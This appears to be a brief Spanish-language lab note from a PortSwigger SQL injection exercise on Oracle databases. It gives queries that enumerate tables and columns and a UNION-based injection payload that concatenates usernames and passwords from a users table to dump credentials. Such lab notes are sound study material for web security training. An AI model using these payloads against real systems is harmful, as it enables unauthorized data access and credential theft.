06 - SQL injection attack, listing the database contents on Oracle
#sqli #unionattack #oracle #infodisclosure #portswigger Oracle detected
Extraemos nombres de las tablas (en oracle solo hay una base de datos)
SQL
SELECT owner, table_name FROM all_tables;SQL
SELECT column_name,column_name FROM all_tab_columns WHERE table_name = 'TABLE-NAME-HERE'Dumpeamos los datos con concatenaciones :
SQL
'+UNION+SELECT+USERNAME_UKFAPP||':'||PASSWORD_LHYWXK,''+FROM+USERS_HSTQSG+--+-